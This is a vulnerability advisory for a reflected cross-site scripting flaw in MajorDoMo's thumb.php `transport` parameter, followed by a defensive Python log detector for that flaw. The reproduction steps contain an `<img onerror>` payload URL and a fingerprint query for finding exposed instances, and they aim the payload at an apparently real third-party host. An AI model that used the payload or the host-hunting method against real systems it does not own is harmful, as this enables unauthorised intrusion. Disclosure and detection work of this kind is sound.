BUG_Author:

hbzms

Vendor:

https://majordomo.smartliving.ru/

Vulnerability description

Cross-Site Scripting (XSS) vulnerability in MajorDoMo before commit 0662e5e allows an attacker to escalate privileges via the thumb/thumb.php component (the `transport` parameter is reflected into the page when `debug=1` is set).

Affected versions

MajorDoMo < 0662e5e

Reproduction steps

Fingerprint used to find exposed instances: app="MajordomoSL"
Locate affected assets with that query (one instance is used here as an example):
1. Open http://95.110.79.90:9090/
2. Append the payload to the URL. The full request is:
http://95.110.79.90:9090/modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%3Cimg%20src=1%20onerror=alert(1)%3E
3. The `transport` value is reflected unescaped in the debug output and the injected `<img onerror>` handler runs, producing the alert dialog.
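Because the injection point is a reflected query parameter of a fixed endpoint, it is easy to spot in web-server access logs. The following detector is an added example written for this advisory, not code from MajorDoMo: it assumes combined log format and the endpoint path shown above, and it runs over constructed sample lines (the payload from this page as the positive case).

```python
"""Flag requests to MajorDoMo's modules/thumb/thumb.php whose parameters carry markup."""
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Request line inside a combined-format access log entry: "GET /path?query HTTP/1.1"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Markup or script handlers that have no legitimate place in a thumbnail URL/transport.
HTML_RE = re.compile(r'<\s*/?\s*[a-z][a-z0-9]*|\bon[a-z]+\s*=|javascript:', re.IGNORECASE)
THUMB_PATH = "/modules/thumb/thumb.php"  # endpoint named in the advisory


def decode_param(value, rounds=3):
    """Percent-decode repeatedly so double-encoded payloads are still inspected."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_request(target):
    """Return a finding dict for a tainted thumb.php request, or None if clean."""
    parts = urlsplit(target)
    if not parts.path.endswith(THUMB_PATH):
        return None
    params = parse_qs(parts.query, keep_blank_values=True)
    tainted = {}
    for name, values in params.items():
        for v in values:
            decoded = decode_param(v)
            if HTML_RE.search(decoded):
                tainted[name] = decoded
    if not tainted:
        return None
    # debug=1 is what causes the parameter to be echoed back, so record it.
    return {"path": parts.path,
            "debug_enabled": params.get("debug", [""])[0] == "1",
            "tainted_params": tainted}


def scan_log(lines):
    """Run inspect_request over each access-log line; return the list of findings."""
    findings = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if m and (finding := inspect_request(m.group("target"))):
            findings.append(finding)
    return findings


# Constructed sample log lines (RFC 5737 documentation addresses, not real clients).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Jan/2024:10:00:01 +0000] "GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%3Cimg%20src=1%20onerror=alert(1)%3E HTTP/1.1" 200 512',
    '203.0.113.6 - - [10/Jan/2024:10:00:02 +0000] "GET /modules/thumb/thumb.php?url=cnRzcDovL2EK HTTP/1.1" 200 4096',
    '203.0.113.7 - - [10/Jan/2024:10:00:03 +0000] "GET /index.php?transport=%3Cb%3E HTTP/1.1" 200 100',
]
```

Only the first sample line is reported: the second is a benign thumbnail request and the third hits a different path, which keeps the rule narrow enough to avoid paging on ordinary traffic.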

Repair suggestions

Update MajorDoMo to commit 0662e5e or later. Until then, do not expose the MajorDoMo interface to the Internet, or restrict access to the interface settings so that only trusted networks can reach it.